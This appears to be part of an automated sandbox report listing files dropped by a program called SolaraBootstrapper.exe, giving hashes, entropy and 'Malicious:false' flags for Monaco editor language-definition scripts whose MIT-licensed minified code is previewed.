                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/apex/apex", ["require","require"],(require)=>{.var moduleExports=(()=>{var i=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var c=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var d=(e,t)=>{for(var s in t)i(e,s,{get:t[s],enumerable:!0})},g=(e,t,s,a)=>{if(t&&typeof t=="object"||typeof t=="function")for(let o of c(t))!l.call(e,o)&&o!==s&&i(e,o,{get:()=>t[o],enumerable:!(a=r(t,o))||a.enumerable});return e};var p=e=>g(i({},"__esModule",{value:!0}),e);var h={};d(h,{conf:()=>m,language:()=>b});var m={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\#\%
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1170)
                                                  Category:dropped
                                                  Size (bytes):1673
                                                  Entropy (8bit):5.302245568375456
                                                  Encrypted:false
                                                  SSDEEP:24:pQyiDHn43tgb2RsIbEgh++/gPO1uGD5YC0aPs0vKPs0vHPs0NIhrKW:pQFDHn43tZRsD+/EO4GB11W1H1NIh1
                                                  MD5:3F7EB57DA423D9D030D1652B8DE22E8F
                                                  SHA1:08E12D584A4C709192C8170647A3C5DC84166371
                                                  SHA-256:0BCDFD620DADCA6EF6B9CD908228790E82B06FBBD6607513789CEA42BBF1C67F
                                                  SHA-512:FB42510901901666D99EE3CC185E8576985049F3B7D0DE857AF3A8F99690370B8B26F1E06EC812B39F330AC7704E110EEBA9B4FD0431A1D91D58D9EC87462ACD
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/azcli/azcli", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var r=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(t,e)=>{for(var o in e)s(t,o,{get:e[o],enumerable:!0})},k=(t,e,o,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of r(e))!l.call(t,n)&&n!==o&&s(t,n,{get:()=>e[n],enumerable:!(a=i(e,n))||a.enumerable});return t};var p=t=>k(s({},"__esModule",{value:!0}),t);var d={};c(d,{conf:()=>f,language:()=>g});var f={comments:{lineComment:"#"}},g={defaultT
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2167)
                                                  Category:dropped
                                                  Size (bytes):2666
                                                  Entropy (8bit):5.475752673187107
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRsS9+/ECO0HQ0Cw0V1+T01+BukGB3j4ly0/eX1HroHrb4rHK9mIP1p:pQFDHnYRsE+/ECOACvV1+I1+kB3j4lym
                                                  MD5:3D5DEB3A173B138998890CCDDBAA876E
                                                  SHA1:2A9E3EE457FD313D95B981E547D5008742F23F81
                                                  SHA-256:64C1D55E14052EB1E56F09DE7380274A6CDE5F6579DE317D6CA7E3D27CC11A18
                                                  SHA-512:BBE95876520DCBE9B73BEFF22AE911CABA167F6755734C28F54AEF83413BB02D1BEDFD933B9A61AE92FE645B5375AFD44AAF825DC416413C7B7142C06AE1903D
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/bat/bat", ["require","require"],(require)=>{.var moduleExports=(()=>{var n=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var l=Object.getOwnPropertyNames;var i=Object.prototype.hasOwnProperty;var g=(o,e)=>{for(var t in e)n(o,t,{get:e[t],enumerable:!0})},c=(o,e,t,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let s of l(e))!i.call(o,s)&&s!==t&&n(o,s,{get:()=>e[s],enumerable:!(a=r(e,s))||a.enumerable});return o};var p=o=>c(n({},"__esModule",{value:!0}),o);var k={};g(k,{conf:()=>d,language:()=>m});var d={comments:{lineComment:"REM"},brackets:[["{"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1734)
                                                  Category:dropped
                                                  Size (bytes):3361
                                                  Entropy (8bit):5.304593500233218
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsg/17Xl0E6r/V1+mQEV1+gqJyq1ee9Vsv0Z91a5adS:G9Y30E6r3TJQdVsv0Zra5adS
                                                  MD5:4664FB176151E58A2D4796B6327FCAE6
                                                  SHA1:61049BF36E9D26D94A439772F6B121847B483774
                                                  SHA-256:138890BB900C772B9CD85A6A880A4C3834D4CF69FE60A7DB4F0ED5AC6A6036CA
                                                  SHA-512:253F9EC3F72D5D7B77DA147361ADBB1A7F3F1F3EFF55454D837CEFC0F49B4292B5C7CE466BB469A6BA48EF9EA8F59228B03588EFC2028299D7228789B8B88456
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/bicep/bicep", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var s=Object.getOwnPropertyDescriptor;var c=Object.getOwnPropertyNames;var a=Object.prototype.hasOwnProperty;var g=(e,n)=>{for(var o in n)r(e,o,{get:n[o],enumerable:!0})},l=(e,n,o,i)=>{if(n&&typeof n=="object"||typeof n=="function")for(let t of c(n))!a.call(e,t)&&t!==o&&r(e,t,{get:()=>n[t],enumerable:!(i=s(n,t))||i.enumerable});return e};var m=e=>l(r({},"__esModule",{value:!0}),e);var y={};g(y,{conf:()=>$,language:()=>w});var p=e=>`\\b${e}\\b`,k="[_a-zA-Z]",x="[_a-zA-
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2507)
                                                  Category:dropped
                                                  Size (bytes):3016
                                                  Entropy (8bit):5.258687166883505
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRsdC+/EOHgUr5Xz0V1+hmQ/Y0V1+hmQ/Ogkq1c0VqYAy7TJq1xFiW9:pQFDHnYRs8+/EVUrmV1+hmQ/XV1+hmQa
                                                  MD5:64C2F717418FCEE34DDC32E4AE0AEEB5
                                                  SHA1:F2F8D5D092EDBE8DF25DA12142E25DAC50CF6744
                                                  SHA-256:9C69C0623EAA0C03D7268F7B640E7B1E4A7613168FB7453E1DF44D918D20D37C
                                                  SHA-512:A0BAB29F1D07C04E9980F11AA4080D6029FFA975449254B91A0F7B59272CFCA72DB05A261614C1BD4356E798E9DFD6A6A912ADD5D862AEB6769C646A7A5971CD
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/cameligo/cameligo", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(o,e)=>{for(var n in e)s(o,n,{get:e[n],enumerable:!0})},m=(o,e,n,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of a(e))!l.call(o,t)&&t!==n&&s(o,t,{get:()=>e[t],enumerable:!(r=i(e,t))||r.enumerable});return o};var p=o=>m(s({},"__esModule",{value:!0}),o);var u={};c(u,{conf:()=>d,language:()=>g});var d={comments:{lineComment:"//",blockC
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (9965)
                                                  Category:dropped
                                                  Size (bytes):10472
                                                  Entropy (8bit):4.885229389881109
                                                  Encrypted:false
                                                  SSDEEP:192:G9YW897PKZLQ3xN//F3kxVrpHJJJbs+b9N1FhbZDbBPjwnIHUB1:Gd85PKZLQvZkxVdp3XbLhZtwnI0
                                                  MD5:A477AC7FA29FA1D433C807B0D51AA453
                                                  SHA1:CACC81F6218791005258647F27D4248E39529007
                                                  SHA-256:F518EDBD296F40149368695CFD50BAD56C40D3E98648D4BCB24FB887DF0763B6
                                                  SHA-512:9CC4E9653F73B55B143E8AB4D9C3FCED9817FDAF4D6CAD45D488D409F4853567BCA3F5BB1387072CA388171B8861300FFA25B239A8594D4F024D8E31EC654C2F
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/clojure/clojure", ["require","require"],(require)=>{.var moduleExports=(()=>{var a=Object.defineProperty;var o=Object.getOwnPropertyDescriptor;var i=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var d=(t,e)=>{for(var r in e)a(t,r,{get:e[r],enumerable:!0})},l=(t,e,r,s)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of i(e))!c.call(t,n)&&n!==r&&a(t,n,{get:()=>e[n],enumerable:!(s=o(e,n))||s.enumerable});return t};var p=t=>l(a({},"__esModule",{value:!0}),t);var h={};d(h,{conf:()=>u,language:()=>m});var u={comments:{lineComment:";;"},bracket
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3912)
                                                  Category:dropped
                                                  Size (bytes):4417
                                                  Entropy (8bit):5.3163232411791554
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsX+/EZQI0xqmV1+/0V1+/Zq1S8YLYGbSiv5vjmtMzkJgd+fcAr6fPlZ:G9YIgqix7iiihjmtykJbcAr6fX
                                                  MD5:C7530C18128C1C16EE01A2C9AA5AD5CD
                                                  SHA1:39036D2CAF933BB3208C02FDFD918FCEF5366640
                                                  SHA-256:B71FA40D1DFCF8A0A4A1D9741BDCB480ED427F6449D504039CF0D6DA230CD5B9
                                                  SHA-512:80D6AB3A7ABFA49677CB01874FE621161D6428D117E597DB5A6E5A4D7A3346E5FEDADD0E38F77B1D74A11C3A42524946BC2AC3B57C92956D7D7A71A4ECE4AF60
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/coffee/coffee", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var g=Object.getOwnPropertyNames;var a=Object.prototype.hasOwnProperty;var l=(n,e)=>{for(var t in e)s(n,t,{get:e[t],enumerable:!0})},p=(n,e,t,o)=>{if(e&&typeof e=="object"||typeof e=="function")for(let r of g(e))!a.call(n,r)&&r!==t&&s(n,r,{get:()=>e[r],enumerable:!(o=i(e,r))||o.enumerable});return n};var c=n=>p(s({},"__esModule",{value:!0}),n);var m={};l(m,{conf:()=>d,language:()=>x});var d={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (5800)
                                                  Category:dropped
                                                  Size (bytes):6299
                                                  Entropy (8bit):5.239106668769126
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsNm+/ETPHSrbV1+gqVV1+/GVb9ZRC2seM6jjz1NMwVcEghhbac7bwwGp:G9YEufSrTOjVv5M6bh8hlHwiYg19c
                                                  MD5:5CB18F40121375F10F0A877FE2655952
                                                  SHA1:370CF78EAFCC875D9D8E34FC8B699CEA67CC2AEA
                                                  SHA-256:F6F92ABE974F9338086148C8B0A60FB565AE6EDD9246B676FA9D0035F4E8D9EB
                                                  SHA-512:71BBAD229EEC49FFA610032A0BE07A8B72DF9EF819CA70FD25C1D8CF7053CED441F9125F26878D0562023417CFDC4C98BB3A31D02A6157CE4EB14276B640FD4C
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/cpp/cpp", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var s=Object.getOwnPropertyNames;var _=Object.prototype.hasOwnProperty;var c=(n,e)=>{for(var i in e)r(n,i,{get:e[i],enumerable:!0})},l=(n,e,i,o)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of s(e))!_.call(n,t)&&t!==i&&r(n,t,{get:()=>e[t],enumerable:!(o=a(e,t))||o.enumerable});return n};var d=n=>l(r({},"__esModule",{value:!0}),n);var g={};c(g,{conf:()=>p,language:()=>m});var p={comments:{lineComment:"//",blockComment:["/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (4846)
                                                  Category:dropped
                                                  Size (bytes):5351
                                                  Entropy (8bit):5.216370494496688
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs8+/E8sx+rbV1+gqGV1+hmQjq1cBh8bnj8/pLxb6J994wGcKU7dYIkeC:G9Yv+rTtP1upw9SiKUJGv
                                                  MD5:7C9B741F42178B079747027A06462053
                                                  SHA1:B3E1D9DE364DD2AECD5DABA0946A4AAFF1A7312E
                                                  SHA-256:28A25E9B68E5F0C3AF4BD163E1AAC554BAB89078770DFCABA0A63A4B5B8A2543
                                                  SHA-512:E0CA6E84440B806D853A8B38EA4154E8F9846F75E8A1D5E472F351C7358A3B3A19FECFE8133114C864C8B439DF1760C04840D6542A8E7FB2FDA019458220A608
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/csharp/csharp", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var l=(t,e)=>{for(var o in e)s(t,o,{get:e[o],enumerable:!0})},p=(t,e,o,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of a(e))!c.call(t,n)&&n!==o&&s(t,n,{get:()=>e[n],enumerable:!(i=r(e,n))||i.enumerable});return t};var g=t=>p(s({},"__esModule",{value:!0}),t);var u={};l(u,{conf:()=>d,language:()=>m});var d={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1741)
                                                  Category:dropped
                                                  Size (bytes):2240
                                                  Entropy (8bit):5.22208525490407
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRs1hV//EXHNTs/6meb64u43IbLRhFLYDbA:pQFDHnYRs1hV//EXNOeb64f6EbA
                                                  MD5:9968CD8D1FF81B94983401B7C5BC68CF
                                                  SHA1:CC830B8D497ABBC54123BF31D3BA77AC6ABC97F8
                                                  SHA-256:082EB55C25CC428C596B69D8024EB8AD5932FD556D47FDB4696124086AF3CB28
                                                  SHA-512:B4D5E7A77F58D724A619430D6BD4B04384B89F6A4B98B13215D2E89C06BBF4B20264E9271D1DF330C25C7070F886FD2A3874DE1E57B82BC7CAF860D6F88A426C
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/csp/csp", ["require","require"],(require)=>{.var moduleExports=(()=>{var o=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var u=Object.getOwnPropertyNames;var g=Object.prototype.hasOwnProperty;var a=(r,t)=>{for(var s in t)o(r,s,{get:t[s],enumerable:!0})},c=(r,t,s,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let e of u(t))!g.call(r,e)&&e!==s&&o(r,e,{get:()=>t[e],enumerable:!(n=i(t,e))||n.enumerable});return r};var q=r=>c(o({},"__esModule",{value:!0}),r);var p={};a(p,{conf:()=>f,language:()=>l});var f={brackets:[],autoClosingPairs:[],surrounding
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2086)
                                                  Category:dropped
                                                  Size (bytes):5331
                                                  Entropy (8bit):5.251960077024982
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsG+/EPumYzIq+q17qcq6V1+/TMj1cqTroIrqjAfF3l5XY0JK:G9YLDYzv9CmjoMfF33XbJK
                                                  MD5:E0809107E35A0192F33AD03C3AB08ABE
                                                  SHA1:3C058A89DF1C0A6B208D48796EDD207239FD3013
                                                  SHA-256:ED689DC48B3A5C75D3F4088B87501B28C69EA53D94BD4D195439B9D0B0125240
                                                  SHA-512:A7D534EE62EE3381547E22EAF23B8BD9F9A12B230EEB9D6391AFBEA69DAEDF73BF0A3E2AC4FBBE3E386698DB3B73674473D691F0B2CE566DD8AB012FCB5C3EEE
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/css/css", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var s=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var m=(t,e)=>{for(var o in e)r(t,o,{get:e[o],enumerable:!0})},c=(t,e,o,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of s(e))!l.call(t,n)&&n!==o&&r(t,n,{get:()=>e[n],enumerable:!(i=a(e,n))||i.enumerable});return t};var d=t=>c(r({},"__esModule",{value:!0}),t);var k={};m(k,{conf:()=>u,language:()=>p});var u={wordPattern:/(#?-?\d*\.\d\w*%?)|((::|[@#.!:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3707)
                                                  Category:dropped
                                                  Size (bytes):4212
                                                  Entropy (8bit):5.371981411047698
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsaL+/EQmrbV1+/mQcV1+/mQpj1jCpRrBafRVxpVC7Qsl:G9YHdrT1x1kjCLrUZL2P
                                                  MD5:F632F554049CE3CA0D264A0ABB02906C
                                                  SHA1:A0A2664DD3EA31DA925AA0EA68D672E648097ADB
                                                  SHA-256:9F9251788F10C3F0BB4EB811CE6A7F5AD8DB7BBEE057B76A77C77C2421FDAAE1
                                                  SHA-512:12F0A0327833F356AB434301DCF3D1F38628C77B10B82E1BF1DD6F0E77097BD50F396AD6D66390E24C696C8CF4EE2B1F5A48D2DD2FBC85AED0DB5967B0A64D45
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/cypher/cypher", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(i,e)=>{for(var n in e)s(i,n,{get:e[n],enumerable:!0})},g=(i,e,n,o)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of a(e))!l.call(i,t)&&t!==n&&s(i,t,{get:()=>e[t],enumerable:!(o=r(e,t))||o.enumerable});return i};var p=i=>g(s({},"__esModule",{value:!0}),i);var u={};c(u,{conf:()=>d,language:()=>m});var d={comments:{lineComment:"//",blockComme
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (4572)
                                                  Category:dropped
                                                  Size (bytes):5073
                                                  Entropy (8bit):5.322308379025634
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsW+/EFrbV1+gqKIqHV1+hmQ1+/GuKkxLiXb6IosPt2wpc3luSW720/:G9YBrTTP4mBc2dsSW7L
                                                  MD5:24E97F371A7EDD0923399C3301F7D123
                                                  SHA1:139B20C81784B4453FDFA5BF8E364C51155865B3
                                                  SHA-256:DA7EF3DEE2FA6414326FF00BFC0417D107D51BAEDFE57389E59058072A00020C
                                                  SHA-512:15A737D3A531253B7CAB0B9A71D5BF2D35017A63135F854237B5F1DF45D50E5C0F3F944ABD5BCEF8BCFFFEC3C4F4BF9736ECBBCB42DCD55B375EF4DBA02996F4
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/dart/dart", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var c=Object.getOwnPropertyNames;var a=Object.prototype.hasOwnProperty;var p=(n,e)=>{for(var t in e)r(n,t,{get:e[t],enumerable:!0})},g=(n,e,t,s)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of c(e))!a.call(n,o)&&o!==t&&r(n,o,{get:()=>e[o],enumerable:!(s=i(e,o))||s.enumerable});return n};var l=n=>g(r({},"__esModule",{value:!0}),n);var x={};p(x,{conf:()=>d,language:()=>m});var d={comments:{lineComment:"//",blockComment:[
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2191)
                                                  Category:dropped
                                                  Size (bytes):2704
                                                  Entropy (8bit):5.455268695879549
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRsnq+/ETQXHFUb0Ar0V1+/n0V1+/pfo71m4SKoemBjrBrOuWI5w3I+:pQFDHnYRsq+/Ecr7V1+/0V1+/pfoOhR2
                                                  MD5:A51BAE8524A9B4623E57F5B1A69DD9E1
                                                  SHA1:686C6F915FFB7EA23DF8E3D6846288A615C144A2
                                                  SHA-256:5BFE103714FF8153914DAA7C1CC066D59DAB07CA7388D15098D650149EE3BE74
                                                  SHA-512:D5070B4206DEE6241F3C427CAF1938781A6AA664A82F546574F3536FF97DB9682D0DE18A8BF46CB5A9A911B38487D16DD8C4F2AABEFAA0BEF34F5FD33B0DBEC2
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/dockerfile/dockerfile", ["require","require"],(require)=>{.var moduleExports=(()=>{var a=Object.defineProperty;var l=Object.getOwnPropertyDescriptor;var r=Object.getOwnPropertyNames;var i=Object.prototype.hasOwnProperty;var p=(o,e)=>{for(var s in e)a(o,s,{get:e[s],enumerable:!0})},g=(o,e,s,t)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of r(e))!i.call(o,n)&&n!==s&&a(o,n,{get:()=>e[n],enumerable:!(t=l(e,n))||t.enumerable});return o};var c=o=>g(a({},"__esModule",{value:!0}),o);var k={};p(k,{conf:()=>u,language:()=>d});var u={brackets:[["{","}"],["[","]"]
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (5664)
                                                  Category:dropped
                                                  Size (bytes):6163
                                                  Entropy (8bit):4.934188303263368
                                                  Encrypted:false
                                                  SSDEEP:192:G9Y/rTtPcbYHAcX4vLXC2/U9w+JXuHN+i56:GOrTtPcbYHvXyLcWcXuHN+i56
                                                  MD5:2CD641F99D4723ADCA2299186E67455B
                                                  SHA1:5ED74D0D63E4AAE25387D0111B7A33C2906D8C92
                                                  SHA-256:9CE97CCF4768AF38976D051504B59DC37B65F56D8BCB638B97D6A82CDA4E1B79
                                                  SHA-512:0306CCDFCCE65A703F5115B13CE0ACC56E7855579BC6CA218D0C87891E97882E21186C38B3429A077F5355FE9711E302FC3D9517C63DACE2271440B1242DFF2C
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/ecl/ecl", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var s=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(o,e)=>{for(var t in e)r(o,t,{get:e[t],enumerable:!0})},d=(o,e,t,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of s(e))!l.call(o,n)&&n!==t&&r(o,n,{get:()=>e[n],enumerable:!(a=i(e,n))||a.enumerable});return o};var p=o=>d(r({},"__esModule",{value:!0}),o);var g={};c(g,{conf:()=>m,language:()=>u});var m={comments:{lineComment:"//",blockComment:["/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (10579)
                                                  Category:dropped
                                                  Size (bytes):11084
                                                  Entropy (8bit):5.324445265410224
                                                  Encrypted:false
                                                  SSDEEP:192:G9YZ+uT4pKAnTNGZ70U+6ODfDG6g4KlDItrkekkqamfP7OF/ExZKxOMy56L4dT/q:Gm+uT4n2+PPV9+DItruao2f
                                                  MD5:E0AB738DD28FB6FA3C3DFD4879A8B930
                                                  SHA1:4062CE2854028385D0E4507AC0AB77CB0FFAA329
                                                  SHA-256:0494EA6B17F3F6E2E088DBC9001AAF77D742D757867263D8B0E5FB432B31A2A5
                                                  SHA-512:0C2BD491B70AFB05261FC1CDB05BFC588D82A05B9695F9C00CDE6EC885858133DE11F95251C8B36D5107B9B68AB94F35415A0D8D8B2D0BDCEC312D100CA9FF45
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/elixir/elixir", ["require","require"],(require)=>{.var moduleExports=(()=>{var o=Object.defineProperty;var l=Object.getOwnPropertyDescriptor;var s=Object.getOwnPropertyNames;var a=Object.prototype.hasOwnProperty;var d=(t,e)=>{for(var i in e)o(t,i,{get:e[i],enumerable:!0})},c=(t,e,i,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of s(e))!a.call(t,n)&&n!==i&&o(t,n,{get:()=>e[n],enumerable:!(r=l(e,n))||r.enumerable});return t};var m=t=>c(o({},"__esModule",{value:!0}),t);var p={};d(p,{conf:()=>u,language:()=>g});var u={comments:{lineComment:"#"},brackets:[
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2132)
                                                  Category:dropped
                                                  Size (bytes):2635
                                                  Entropy (8bit):5.352095130632229
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRsumU+/EVHg+2rQ6MnQn11nWn6b0V1+/mQgTCFd1KhMmVZUbF+WwSo:pQFDHnYRsM+/EeRraY1JKBV1+/mQKIzg
                                                  MD5:EF8BA0EA3AE910695528D18376C8951C
                                                  SHA1:EADBA0FEE009E89CDF57CBE2AFC8A66683399776
